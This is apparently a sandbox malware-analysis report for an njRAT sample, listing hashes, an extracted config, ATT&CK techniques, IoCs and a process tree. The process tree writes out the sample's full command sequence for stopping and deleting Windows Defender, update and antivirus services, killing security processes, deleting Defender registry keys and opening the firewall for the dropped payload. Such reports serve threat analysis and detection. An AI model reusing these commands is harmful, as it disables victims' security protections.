njrat | e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c

General

Target

e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
Size

341KB
MD5

e8fb8e14c5e50dd51a7499b84e2c857a
SHA1

bad853c5496bc28f492c01cdc6fff77efd72dc74
SHA256

e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c
SHA512

2b15a3c3cb4b04f978043d45ac32ed2ab7dfef11ec0b6010a73a2d39b8aa112b18846cb60383c63108fd7bcd4c7f9abae26b354320902a59f923d436d73f4131

Score

10^/10

njrat cvcvc evasion trojan

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

cvcvc

C2

127.0.0.1:6544

Mutex

f08ba698cf12b161ed2e70452386d723

Attributes

reg_key
f08ba698cf12b161ed2e70452386d723
splitter
Y262SUCZ4UJJ

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Nirsoft 5 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft

Executes dropped EXE 5 IoCs

Processes:

AdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.execd.exe

pid process

2620 AdvancedRun.exe
3488 AdvancedRun.exe
2640 AdvancedRun.exe
2220 AdvancedRun.exe
2868 cd.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Drops file in Program Files directory 64 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Security\BROWSE~1\en-US\BrowserCore.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\WATPCSP.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\Offline\MsMpLics.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpResL.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\fr-FR\MsSense.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MsMpResL.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\ja-JP\MsSense.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpResL.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\Offline\EppManifest.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\de-DE\MsSense.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Security\BROWSE~1\BrowserCore.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpResL.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncPS.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\en-US\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Security\BROWSE~1\manifest.json	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui	cmd.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1920 taskkill.exe
1304 taskkill.exe
752 taskkill.exe
652 taskkill.exe
3888 taskkill.exe

pid	process
1920	taskkill.exe
1304	taskkill.exe
752	taskkill.exe
652	taskkill.exe
3888	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

AdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.execd.exe

pid	process
2620	AdvancedRun.exe
2620	AdvancedRun.exe
2620	AdvancedRun.exe
2620	AdvancedRun.exe
3488	AdvancedRun.exe
3488	AdvancedRun.exe
3488	AdvancedRun.exe
3488	AdvancedRun.exe
2640	AdvancedRun.exe
2640	AdvancedRun.exe
2640	AdvancedRun.exe
2640	AdvancedRun.exe
2220	AdvancedRun.exe
2220	AdvancedRun.exe
2220	AdvancedRun.exe
2220	AdvancedRun.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe
2868	cd.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

AdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execd.exe

description	pid	process
Token: SeDebugPrivilege	2620	AdvancedRun.exe
Token: SeImpersonatePrivilege	2620	AdvancedRun.exe
Token: SeDebugPrivilege	3488	AdvancedRun.exe
Token: SeImpersonatePrivilege	3488	AdvancedRun.exe
Token: SeDebugPrivilege	2640	AdvancedRun.exe
Token: SeImpersonatePrivilege	2640	AdvancedRun.exe
Token: SeDebugPrivilege	2220	AdvancedRun.exe
Token: SeImpersonatePrivilege	2220	AdvancedRun.exe
Token: SeDebugPrivilege	652	taskkill.exe
Token: SeDebugPrivilege	3888	taskkill.exe
Token: SeDebugPrivilege	1920	taskkill.exe
Token: SeDebugPrivilege	1304	taskkill.exe
Token: SeDebugPrivilege	752	taskkill.exe
Token: SeDebugPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe
Token: 33	2868	cd.exe
Token: SeIncBasePriorityPrivilege	2868	cd.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exeAdvancedRun.exeAdvancedRun.execmd.exe

description	pid	process	target process
PID 2160 wrote to memory of 2620	2160	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	AdvancedRun.exe
PID 2160 wrote to memory of 2620	2160	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	AdvancedRun.exe
PID 2620 wrote to memory of 3488	2620	AdvancedRun.exe	AdvancedRun.exe
PID 2620 wrote to memory of 3488	2620	AdvancedRun.exe	AdvancedRun.exe
PID 2160 wrote to memory of 2640	2160	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	AdvancedRun.exe
PID 2160 wrote to memory of 2640	2160	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	AdvancedRun.exe
PID 2640 wrote to memory of 2220	2640	AdvancedRun.exe	AdvancedRun.exe
PID 2640 wrote to memory of 2220	2640	AdvancedRun.exe	AdvancedRun.exe
PID 2160 wrote to memory of 3552	2160	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	cmd.exe
PID 2160 wrote to memory of 3552	2160	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	cmd.exe
PID 2160 wrote to memory of 3552	2160	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	cmd.exe
PID 3552 wrote to memory of 1204	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1204	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1204	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 680	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 680	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 680	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1160	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1160	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1160	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3328	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3328	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3328	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1972	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1972	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1972	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1236	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1236	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1236	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1424	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1424	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1424	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 904	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 904	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 904	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 900	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 900	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 900	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3896	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3896	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3896	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3888	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3888	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3888	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3404	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3404	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3404	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3440	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3440	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3440	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1540	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1540	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1540	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1000	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1000	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1000	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3180	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3180	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 3180	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 2868	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 2868	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 2868	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1500	3552	cmd.exe	sc.exe
PID 3552 wrote to memory of 1500	3552	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
"C:\Users\Admin\AppData\Local\Temp\e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2160

C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /EXEFilename test.bat /RunAs 8 /Run
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2620

C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /SpecialRun 140020920 2620
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3488

C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /EXEFilename test.bat /RunAs 8 /Run
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2640

C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /SpecialRun 140020920 2640
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\test.bat" "
2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3552

C:\Windows\SysWOW64\sc.exe
sc stop windefend
3⤵
PID:1204

C:\Windows\SysWOW64\sc.exe
sc config windefend start= disabled
3⤵
PID:680

C:\Windows\SysWOW64\sc.exe
sc delete windefend
3⤵
PID:1160

C:\Windows\SysWOW64\sc.exe
sc stop WdNisSvc
3⤵
PID:3328

C:\Windows\SysWOW64\sc.exe
sc config WdNisSvc start= disabled
3⤵
PID:1972

C:\Windows\SysWOW64\sc.exe
sc delete WdNisSvc
3⤵
PID:1236

C:\Windows\SysWOW64\sc.exe
sc stop Sense
3⤵
PID:1424

C:\Windows\SysWOW64\sc.exe
sc config Sense start= disabled
3⤵
PID:904

C:\Windows\SysWOW64\sc.exe
sc delete Sense
3⤵
PID:900

C:\Windows\SysWOW64\sc.exe
sc stop wuauserv
3⤵
PID:3896

C:\Windows\SysWOW64\sc.exe
sc config wuauserv start= disabled
3⤵
PID:3888

C:\Windows\SysWOW64\sc.exe
sc stop usosvc
3⤵
PID:3404

C:\Windows\SysWOW64\sc.exe
sc config usosvc start= disabled
3⤵
PID:3440

C:\Windows\SysWOW64\sc.exe
sc stop WaasMedicSvc
3⤵
PID:1540

C:\Windows\SysWOW64\sc.exe
sc config WaasMedicSvc start= disabled
3⤵
PID:1000

C:\Windows\SysWOW64\sc.exe
sc stop SecurityHealthService
3⤵
PID:3180

C:\Windows\SysWOW64\sc.exe
sc config SecurityHealthService start= disabled
3⤵
PID:2868

C:\Windows\SysWOW64\sc.exe
sc delete SecurityHealthService
3⤵
PID:1500

C:\Windows\SysWOW64\sc.exe
sc stop SDRSVC
3⤵
PID:2188

C:\Windows\SysWOW64\sc.exe
sc config SDRSVC start= disabled
3⤵
PID:2528

C:\Windows\SysWOW64\sc.exe
sc stop wscsvc
3⤵
PID:1612

C:\Windows\SysWOW64\sc.exe
sc config wscsvc start= disabled
3⤵
PID:3796

C:\Windows\SysWOW64\sc.exe
sc stop WdiServiceHost
3⤵
PID:3824

C:\Windows\SysWOW64\sc.exe
sc config WdiServiceHost start= disabled
3⤵
PID:4084

C:\Windows\SysWOW64\sc.exe
sc stop WdiSystemHost
3⤵
PID:644

C:\Windows\SysWOW64\sc.exe
sc config WdiSystemHost start= disabled
3⤵
PID:3464

C:\Windows\SysWOW64\sc.exe
sc stop InstallService
3⤵
PID:2620

C:\Windows\SysWOW64\sc.exe
sc config InstallService Start= disabled
3⤵
PID:992

C:\Windows\SysWOW64\sc.exe
sc stop VaultSvc
3⤵
PID:3576

C:\Windows\SysWOW64\sc.exe
sc config VaultSvc start= disabled
3⤵
PID:3636

C:\Windows\SysWOW64\sc.exe
sc stop Spooler
3⤵
PID:2296

C:\Windows\SysWOW64\sc.exe
sc config Spooler start= disabled
3⤵
PID:3876

C:\Windows\SysWOW64\sc.exe
sc stop LicenseManager
3⤵
PID:416

C:\Windows\SysWOW64\sc.exe
sc config LicenseManager start= disabled
3⤵
PID:1960

C:\Windows\SysWOW64\sc.exe
sc stop DiagTrack
3⤵
PID:2480

C:\Windows\SysWOW64\sc.exe
sc config DiagTrack start= disabled
3⤵
PID:392

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im smartscreen.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:652

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SecurityHealthService.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3888

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
3⤵
PID:2532

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f
3⤵
PID:1676

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f
3⤵
PID:2364

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f
3⤵
PID:3828

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f
3⤵
PID:3456

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f
3⤵
PID:3844

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f
3⤵
PID:3712

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f
3⤵
PID:2656

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f
3⤵
PID:2696

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f
3⤵
PID:3564

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f
3⤵
PID:2184

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f
3⤵
PID:1932

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f
3⤵
- Modifies security service
PID:2848

C:\Windows\SysWOW64\sc.exe
sc delete windefend
3⤵
PID:372

C:\Windows\SysWOW64\sc.exe
sc delete sense
3⤵
PID:1516

C:\Windows\SysWOW64\sc.exe
sc stop MBAMService
3⤵
PID:3496

C:\Windows\SysWOW64\sc.exe
sc config MBAMService start= disabled
3⤵
PID:988

C:\Windows\SysWOW64\sc.exe
sc delete MBAMService
3⤵
PID:368

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MBAM.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1304

C:\Windows\SysWOW64\sc.exe
sc stop Bytefenceservice
3⤵
PID:1960

C:\Windows\SysWOW64\sc.exe
sc delete Bytefenceservice
3⤵
PID:1236

C:\Windows\SysWOW64\sc.exe
sc config Bytefenceservice start= disabled
3⤵
PID:2480

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Bytefence.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\SysWOW64\sc.exe
sc stop "avast! Tools"
3⤵
PID:3296

C:\Windows\SysWOW64\sc.exe
sc config "avast! Tools" start= disabled
3⤵
PID:3300

C:\Windows\SysWOW64\sc.exe
sc delete "avast! Tools"
3⤵
PID:856

C:\Windows\SysWOW64\sc.exe
sc stop "avast! Antivirus"
3⤵
PID:1484

C:\Windows\SysWOW64\sc.exe
sc config "avast! Antivirus" start= disabled
3⤵
PID:2872

C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2868

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe" "cd.exe" ENABLE
3⤵
PID:1676

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

4

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Disabling Security Tools

1

T1089

Impair Defenses

1

T1562

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
MD5
9125a507060e4b3a3e287452cb71e7a1

SHA1
fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8

SHA256
29c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64

SHA512
5282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
MD5
9125a507060e4b3a3e287452cb71e7a1

SHA1
fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8

SHA256
29c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64

SHA512
5282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
MD5
9125a507060e4b3a3e287452cb71e7a1

SHA1
fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8

SHA256
29c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64

SHA512
5282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
MD5
9125a507060e4b3a3e287452cb71e7a1

SHA1
fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8

SHA256
29c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64

SHA512
